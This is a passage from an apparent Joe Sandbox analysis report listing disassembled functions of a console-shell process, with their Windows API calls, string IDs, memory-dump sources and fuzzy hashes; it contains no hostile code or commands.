                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 001B4205
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B426C
                                                                                                                                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,001B9E02,?,00000010), ref: 001B4283
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B4292
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B42B1
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B42C4
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001B42D2
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 001B42D9
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001B432F
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 001B4336
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 001B43DB
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 001B43F0
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 001B4405
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 001B441A
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 001B442F
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 001B4444
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 001B4459
                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 001B44A5
                                                                                                                                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 001B44F0
                                                                                                                                                                                                                          • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 001B4506
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 001B451D
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001B4565
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 001B456C
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 001B4595
                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001B459C
                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B45C3
                                                                                                                                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,001B9E02,?,00000000), ref: 001B45D4
                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04), ref: 001B45DD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                                                                                                                                                                                          • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                                                                          • API String ID: 2991647268-3100821235
                                                                                                                                                                                                                          • Opcode ID: cfd653acaa0a6e0d3e9d5de95b9a899053755761d33e54b39505a8b3edb376de
                                                                                                                                                                                                                          • Instruction ID: 94225f4870eb5d866f6abd45826ced86b768ec8a339970caff8e9d0f612f3c84
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfd653acaa0a6e0d3e9d5de95b9a899053755761d33e54b39505a8b3edb376de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19C1CF706053019FCB20DF64DC88AABBBE5FF88714F48892DF956C26A1D771C985CB52
                                                                                                                                                                                                                          Function 00194C10 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 552COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                                                                                                                          • API String ID: 0-1980097535
                                                                                                                                                                                                                          • Opcode ID: 403c823eb71b7c7d7527e96d2959d4ac694612b9826430a15e8eb1c9ea1beb86
                                                                                                                                                                                                                          • Instruction ID: 4a8e4874a42823093b7ae99fce74c54128138d371ab17a101bfd6675dca3a7ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 403c823eb71b7c7d7527e96d2959d4ac694612b9826430a15e8eb1c9ea1beb86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E12D1B42083429FDB24DF24C885AAFB7E9EF99344F04492DF589C7291EB34D945CB62
                                                                                                                                                                                                                          Function 00196854 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 366timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,001BE590,?,00002000), ref: 00196896
                                                                                                                                                                                                                          • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 001968AA
                                                                                                                                                                                                                          • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 001968BE
                                                                                                                                                                                                                          • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 001968D2
                                                                                                                                                                                                                          • realloc.MSVCRT ref: 001AA5E7
                                                                                                                                                                                                                            • Part of subcall function 00198791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00196906,0000001F,?,00000080), ref: 00198791
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00196907
                                                                                                                                                                                                                          • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 0019698F
                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,?), ref: 00196A86
                                                                                                                                                                                                                          • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00196AAF
                                                                                                                                                                                                                          • realloc.MSVCRT ref: 00196ACA
                                                                                                                                                                                                                          • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00196AFE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                                                                                                                                                                                          • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                                                                                                                                                                          • API String ID: 2927284792-4023967598
                                                                                                                                                                                                                          • Opcode ID: 23e1f85b6f6e988b9742ff7b19227337c5c32f94b4d7996e6d17271891f8ec8a
                                                                                                                                                                                                                          • Instruction ID: e43d253a498b39f13b029ff69db460b9b01097db9628d4cd80dc3bac18263085
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23e1f85b6f6e988b9742ff7b19227337c5c32f94b4d7996e6d17271891f8ec8a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EC1F476A002259FCF24DF64DC49AFA77B8EF49300F5440AAE90AE7150EB319E85CF61
                                                                                                                                                                                                                          Function 001A4EC1 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 395fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A4F03
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 001A4F67
                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 001A4F77
                                                                                                                                                                                                                          • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00192670,?,?,?,-00000001), ref: 001A4FEB
                                                                                                                                                                                                                          • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 001A5103
                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 001A511E
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 001A5141
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstmemset$Next
                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                          • API String ID: 3059144641-4282027825
                                                                                                                                                                                                                          • Opcode ID: 6388ae86abf1a76b951ab5d4b958babe66ee62131f8108795942f573c21124ad
                                                                                                                                                                                                                          • Instruction ID: e5b769b9dd4987b3306e2181f3587adfcc25c5e30703e1d70180064ab615e028
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6388ae86abf1a76b951ab5d4b958babe66ee62131f8108795942f573c21124ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AE1BE75A042099BDF24EBA8CC85BFE73B9EF69304F4404A9E909D7181E731AE85CB50
                                                                                                                                                                                                                          Function 0019532E Relevance: 19.8, APIs: 13, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000002), ref: 0019539C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: 4ceb19a37a536c41d63c1fdfee8444dd2f9aaa5272d859cff0743d040188cebf
                                                                                                                                                                                                                          • Instruction ID: f164941a74d490d13f425f7954d546385949ce727db130593173328f41c97272
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ceb19a37a536c41d63c1fdfee8444dd2f9aaa5272d859cff0743d040188cebf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AA1F3799001068BCF25DF78C8856BEB3B5FF55310F5585AAE94AE7240EB319EC1CB50
                                                                                                                                                                                                                          Function 001B769E Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(91B40133,00000000,?), ref: 001B7710
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B7722
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001BE590,00002000,?,001D8BF0,00000000,?,?,00198F0D), ref: 0019EC51
                                                                                                                                                                                                                          • towupper.MSVCRT ref: 001B78BC
                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001B79F1
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00191F8C,00193B98), ref: 001B7B15
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,91B40133,00000000,?), ref: 001B7D0D
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001B7D20
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                                                                                                                                                                                                          • String ID: %s $%s>$PROMPT$Unknown
                                                                                                                                                                                                                          • API String ID: 708651206-3050974680
                                                                                                                                                                                                                          • Opcode ID: a0b2f5035081a0d2695d4d4bcd6a32903ead2c5b786cfea33593bedf24bf7fed
                                                                                                                                                                                                                          • Instruction ID: 7044f8209ea922eaa6a1fd8e1376fc8d352f642c56e74ba53ba3b22896297517
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0b2f5035081a0d2695d4d4bcd6a32903ead2c5b786cfea33593bedf24bf7fed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4702F875A051169BCF24EF28CC49AFAB7B5EF84710F54819EE409E7290EB309E81DF94
                                                                                                                                                                                                                          Function 001BC1FA Relevance: 19.7, APIs: 13, Instructions: 179filememorynativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001BC135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 001BC14E
                                                                                                                                                                                                                            • Part of subcall function 001BC135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 001BC16A
                                                                                                                                                                                                                            • Part of subcall function 001BC135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 001BC17B
                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 001BC24F
                                                                                                                                                                                                                          • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 001BC270
                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 001BC293
                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 001BC2AE
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BC2EF
                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 001BC324
                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?), ref: 001BC370
                                                                                                                                                                                                                          • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 001BC392
                                                                                                                                                                                                                          • RtlNtStatusToDosError.NTDLL ref: 001BC39D
                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001BC3A4
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001BC3B6
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 001BC3D1
                                                                                                                                                                                                                          • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001BC3E2
                                                                                                                                                                                                                            • Part of subcall function 001BC5F2: memset.MSVCRT ref: 001BC62E
                                                                                                                                                                                                                            • Part of subcall function 001BC5F2: memset.MSVCRT ref: 001BC656
                                                                                                                                                                                                                            • Part of subcall function 001BC5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 001BC6C7
                                                                                                                                                                                                                            • Part of subcall function 001BC5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 001BC6E6
                                                                                                                                                                                                                            • Part of subcall function 001BC5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 001BC72A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 223857506-0
                                                                                                                                                                                                                          • Opcode ID: 771af1b6d5f3f09dcbe15f0f5a85914630c4b0111eb35b649e7310f2212978eb
                                                                                                                                                                                                                          • Instruction ID: 1c65d72b68e1745b3e652720507095059cc778c656ef80c4b860a40a173dfee6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 771af1b6d5f3f09dcbe15f0f5a85914630c4b0111eb35b649e7310f2212978eb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46518F75A01205AFDB149FB8DC45AFEB7B8FF88304B54816AF802E7251E7349E41CBA0
                                                                                                                                                                                                                          Function 00199310 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 249timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,001BE590,?,00002000), ref: 00199342
                                                                                                                                                                                                                          • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00199356
                                                                                                                                                                                                                          • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0019936A
                                                                                                                                                                                                                          • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0019937E
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 001ABC07
                                                                                                                                                                                                                          • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 001ABD31
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                                                                          • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                                                                                                                                                                                          • API String ID: 55602301-2516506544
                                                                                                                                                                                                                          • Opcode ID: 4a2732eaf79095ac121095e55a46a727d6748a2b38163c594df8ca9622bd3144
                                                                                                                                                                                                                          • Instruction ID: 4f8c6c6b9eea88130e605051dbe2ed870eb3c27b854d7593ad7539ebc3c26866
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a2732eaf79095ac121095e55a46a727d6748a2b38163c594df8ca9622bd3144
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6281F57AA002599BCF24DFA4CC84AFEB3B9EF45704F4441AAE809E7145EB359E85CB50
                                                                                                                                                                                                                          Function 001A589A Relevance: 15.1, APIs: 10, Instructions: 106memoryfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,001A59D0,?,00196054,-00001038,00000000,?,?), ref: 001A58BB
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A58CD
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A5944
                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A594B
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A596C
                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A5973
                                                                                                                                                                                                                          • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A598F
                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001A59B6
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001B160B
                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,001A59D0,?,00196054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 001B1618
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3609286125-0
                                                                                                                                                                                                                          • Opcode ID: 2c89a2e7e75d4056ad186aeb2f688d2b7ed30bb46bfc6527f1e2b3b088bd2db4
